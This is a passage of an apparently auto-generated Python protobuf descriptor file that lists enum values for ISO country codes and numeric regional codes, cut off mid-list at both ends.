_descriptor.EnumValueDescriptor(
name='DK', index=61, number=61,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DJ', index=62, number=62,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DM', index=63, number=63,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DO', index=64, number=64,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EC', index=65, number=65,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EG', index=66, number=66,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SV', index=67, number=67,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GQ', index=68, number=68,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ER', index=69, number=69,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EE', index=70, number=70,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ET', index=71, number=71,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FK', index=72, number=72,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FO', index=73, number=73,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FJ', index=74, number=74,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FI', index=75, number=75,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FR', index=76, number=76,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GF', index=77, number=77,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PF', index=78, number=78,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TF', index=79, number=79,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GA', index=80, number=80,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GM', index=81, number=81,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GE', index=82, number=82,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DE', index=83, number=83,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GH', index=84, number=84,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GI', index=85, number=85,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GR', index=86, number=86,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GL', index=87, number=87,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GD', index=88, number=88,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GP', index=89, number=89,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GU', index=90, number=90,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GT', index=91, number=91,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GG', index=92, number=92,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GN', index=93, number=93,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GW', index=94, number=94,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GY', index=95, number=95,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='HT', index=96, number=96,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='HM', index=97, number=97,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VA', index=98, number=98,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='HN', index=99, number=99,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='HK', index=100, number=100,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='HU', index=101, number=101,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IS', index=102, number=102,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IN', index=103, number=103,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ID', index=104, number=104,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IR', index=105, number=105,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IQ', index=106, number=106,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IE', index=107, number=107,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IM', index=108, number=108,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IL', index=109, number=109,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='IT', index=110, number=110,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='JM', index=111, number=111,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='JP', index=112, number=112,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='JE', index=113, number=113,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='JO', index=114, number=114,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KZ', index=115, number=115,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KE', index=116, number=116,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KI', index=117, number=117,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KP', index=118, number=118,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KR', index=119, number=119,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KW', index=120, number=120,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KG', index=121, number=121,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LA', index=122, number=122,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LV', index=123, number=123,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LB', index=124, number=124,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LS', index=125, number=125,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LR', index=126, number=126,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LY', index=127, number=127,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LI', index=128, number=128,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LT', index=129, number=129,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LU', index=130, number=130,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MO', index=131, number=131,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MK', index=132, number=132,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MG', index=133, number=133,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MW', index=134, number=134,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MY', index=135, number=135,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MV', index=136, number=136,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ML', index=137, number=137,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MT', index=138, number=138,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MH', index=139, number=139,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MQ', index=140, number=140,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MR', index=141, number=141,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MU', index=142, number=142,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='YT', index=143, number=143,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MX', index=144, number=144,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FM', index=145, number=145,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MD', index=146, number=146,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MC', index=147, number=147,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MN', index=148, number=148,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ME', index=149, number=149,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MS', index=150, number=150,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MA', index=151, number=151,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MZ', index=152, number=152,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MM', index=153, number=153,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NA', index=154, number=154,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NR', index=155, number=155,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NP', index=156, number=156,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NL', index=157, number=157,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NC', index=158, number=158,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NZ', index=159, number=159,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NI', index=160, number=160,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NE', index=161, number=161,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NG', index=162, number=162,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NU', index=163, number=163,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NF', index=164, number=164,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MP', index=165, number=165,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NO', index=166, number=166,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='OM', index=167, number=167,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PK', index=168, number=168,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PW', index=169, number=169,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PS', index=170, number=170,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PA', index=171, number=171,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PG', index=172, number=172,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PY', index=173, number=173,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PE', index=174, number=174,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PH', index=175, number=175,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PN', index=176, number=176,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PL', index=177, number=177,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PT', index=178, number=178,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PR', index=179, number=179,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='QA', index=180, number=180,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='RE', index=181, number=181,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='RO', index=182, number=182,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='RU', index=183, number=183,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='RW', index=184, number=184,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='BL', index=185, number=185,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SH', index=186, number=186,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='KN', index=187, number=187,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LC', index=188, number=188,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MF', index=189, number=189,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PM', index=190, number=190,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VC', index=191, number=191,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WS', index=192, number=192,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SM', index=193, number=193,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ST', index=194, number=194,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SA', index=195, number=195,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SN', index=196, number=196,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='RS', index=197, number=197,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SC', index=198, number=198,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SL', index=199, number=199,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SG', index=200, number=200,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SX', index=201, number=201,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SK', index=202, number=202,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SI', index=203, number=203,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SB', index=204, number=204,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SO', index=205, number=205,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ZA', index=206, number=206,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GS', index=207, number=207,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SS', index=208, number=208,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ES', index=209, number=209,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='LK', index=210, number=210,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SD', index=211, number=211,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SR', index=212, number=212,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SJ', index=213, number=213,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SZ', index=214, number=214,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SE', index=215, number=215,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CH', index=216, number=216,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SY', index=217, number=217,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TW', index=218, number=218,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TJ', index=219, number=219,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TZ', index=220, number=220,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TH', index=221, number=221,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TL', index=222, number=222,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TG', index=223, number=223,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TK', index=224, number=224,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TO', index=225, number=225,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TT', index=226, number=226,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TN', index=227, number=227,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TR', index=228, number=228,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TM', index=229, number=229,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TC', index=230, number=230,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TV', index=231, number=231,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UG', index=232, number=232,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UA', index=233, number=233,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AE', index=234, number=234,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='GB', index=235, number=235,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='US', index=236, number=236,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UM', index=237, number=237,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UY', index=238, number=238,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UZ', index=239, number=239,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VU', index=240, number=240,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VE', index=241, number=241,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VN', index=242, number=242,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VG', index=243, number=243,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VI', index=244, number=244,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='WF', index=245, number=245,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EH', index=246, number=246,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='YE', index=247, number=247,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ZM', index=248, number=248,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='ZW', index=249, number=249,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R001', index=250, number=250,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R002', index=251, number=251,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R015', index=252, number=252,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R012', index=253, number=253,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R818', index=254, number=254,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R434', index=255, number=255,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R504', index=256, number=256,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R729', index=257, number=257,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R788', index=258, number=258,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R732', index=259, number=259,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R202', index=260, number=260,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R014', index=261, number=261,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R086', index=262, number=262,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R108', index=263, number=263,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R174', index=264, number=264,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R262', index=265, number=265,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R232', index=266, number=266,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R231', index=267, number=267,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R260', index=268, number=268,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R404', index=269, number=269,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R450', index=270, number=270,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R454', index=271, number=271,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R480', index=272, number=272,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R175', index=273, number=273,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R508', index=274, number=274,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R638', index=275, number=275,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R646', index=276, number=276,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R690', index=277, number=277,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R706', index=278, number=278,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R728', index=279, number=279,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R800', index=280, number=280,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R834', index=281, number=281,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R894', index=282, number=282,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R716', index=283, number=283,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R017', index=284, number=284,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R024', index=285, number=285,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R120', index=286, number=286,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R140', index=287, number=287,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R148', index=288, number=288,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R178', index=289, number=289,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R180', index=290, number=290,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R226', index=291, number=291,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R266', index=292, number=292,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R678', index=293, number=293,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R018', index=294, number=294,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R072', index=295, number=295,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R748', index=296, number=296,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R426', index=297, number=297,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R516', index=298, number=298,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R710', index=299, number=299,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R011', index=300, number=300,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R204', index=301, number=301,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R854', index=302, number=302,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R132', index=303, number=303,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R384', index=304, number=304,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R270', index=305, number=305,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R288', index=306, number=306,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R324', index=307, number=307,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R624', index=308, number=308,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R430', index=309, number=309,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R466', index=310, number=310,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R478', index=311, number=311,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R562', index=312, number=312,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R566', index=313, number=313,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R654', index=314, number=314,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R686', index=315, number=315,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R694', index=316, number=316,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R768', index=317, number=317,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R019', index=318, number=318,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R419', index=319, number=319,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R029', index=320, number=320,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R660', index=321, number=321,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R028', index=322, number=322,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R533', index=323, number=323,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R044', index=324, number=324,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R052', index=325, number=325,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R535', index=326, number=326,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R092', index=327, number=327,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R136', index=328, number=328,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R192', index=329, number=329,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R531', index=330, number=330,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R212', index=331, number=331,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R214', index=332, number=332,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R308', index=333, number=333,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R312', index=334, number=334,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R332', index=335, number=335,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R388', index=336, number=336,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R474', index=337, number=337,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R500', index=338, number=338,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R630', index=339, number=339,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R652', index=340, number=340,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R659', index=341, number=341,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R662', index=342, number=342,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R663', index=343, number=343,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R670', index=344, number=344,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R534', index=345, number=345,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R780', index=346, number=346,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R796', index=347, number=347,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R850', index=348, number=348,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R013', index=349, number=349,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R084', index=350, number=350,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R188', index=351, number=351,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R222', index=352, number=352,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R320', index=353, number=353,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R340', index=354, number=354,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R484', index=355, number=355,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R558', index=356, number=356,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R591', index=357, number=357,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R005', index=358, number=358,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R032', index=359, number=359,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R068', index=360, number=360,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R074', index=361, number=361,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R076', index=362, number=362,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R152', index=363, number=363,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R170', index=364, number=364,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R218', index=365, number=365,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R238', index=366, number=366,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R254', index=367, number=367,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R328', index=368, number=368,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R600', index=369, number=369,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R604', index=370, number=370,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R239', index=371, number=371,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R740', index=372, number=372,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R858', index=373, number=373,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R862', index=374, number=374,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R021', index=375, number=375,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R060', index=376, number=376,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R124', index=377, number=377,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R304', index=378, number=378,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R666', index=379, number=379,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R840', index=380, number=380,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R010', index=381, number=381,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R142', index=382, number=382,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R143', index=383, number=383,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R398', index=384, number=384,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R417', index=385, number=385,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R762', index=386, number=386,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R795', index=387, number=387,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R860', index=388, number=388,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R030', index=389, number=389,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R156', index=390, number=390,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R344', index=391, number=391,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R446', index=392, number=392,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R408', index=393, number=393,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R392', index=394, number=394,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R496', index=395, number=395,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R410', index=396, number=396,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R035', index=397, number=397,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R096', index=398, number=398,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R116', index=399, number=399,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R360', index=400, number=400,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R418', index=401, number=401,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R458', index=402, number=402,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R104', index=403, number=403,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R608', index=404, number=404,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R702', index=405, number=405,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R764', index=406, number=406,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R626', index=407, number=407,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R704', index=408, number=408,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R034', index=409, number=409,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R004', index=410, number=410,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R050', index=411, number=411,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R064', index=412, number=412,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R356', index=413, number=413,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R364', index=414, number=414,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R462', index=415, number=415,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R524', index=416, number=416,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='R586', index=417, number=417,
